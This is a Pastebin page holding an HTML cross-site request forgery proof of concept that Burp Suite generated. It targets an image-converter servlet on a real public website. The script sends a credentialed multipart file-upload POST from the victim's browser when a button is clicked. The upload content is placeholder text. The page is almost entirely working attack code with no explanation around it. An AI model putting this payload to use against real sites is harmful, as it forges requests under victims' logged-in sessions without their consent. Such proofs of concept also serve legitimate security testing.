Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <!-- CSRF PoC - generated by Burp Suite Professional -->
- <body>
- <script>history.pushState('', '', '/')</script>
- <script>
- function submitRequest()
- {
- var xhr = new XMLHttpRequest();
- xhr.open("POST", "https:\/\/www.online-utility.org\/servlet\/ImageConverter", true);
- xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
- xhr.setRequestHeader("Accept-Language", "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3");
- xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------206860758214748693911873600863");
- xhr.withCredentials = true;
- var body = "-----------------------------206860758214748693911873600863\r\n" +
- "Content-Disposition: form-data; name=\"fname\"; filename=\"Logo_sstic_transp.png\"\r\n" +
- "Content-Type: image/png\r\n" +
- "\r\n" +
- "BLABLA\r\n" +
- "-----------------------------206860758214748693911873600863\r\n" +
- "Content-Disposition: form-data; name=\"totot\"\r\n" +
- "Content-Type: image/png\r\n" +
- "\r\n" +
- "titit\r\n" +
- "-----------------------------206860758214748693911873600863--\r\n";
- var aBody = new Uint8Array(body.length);
- for (var i = 0; i < aBody.length; i++)
- aBody[i] = body.charCodeAt(i);
- xhr.send(new Blob([aBody]));
- }
- </script>
- <form action="#">
- <input type="button" value="Submit request" onclick="submitRequest();" />
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement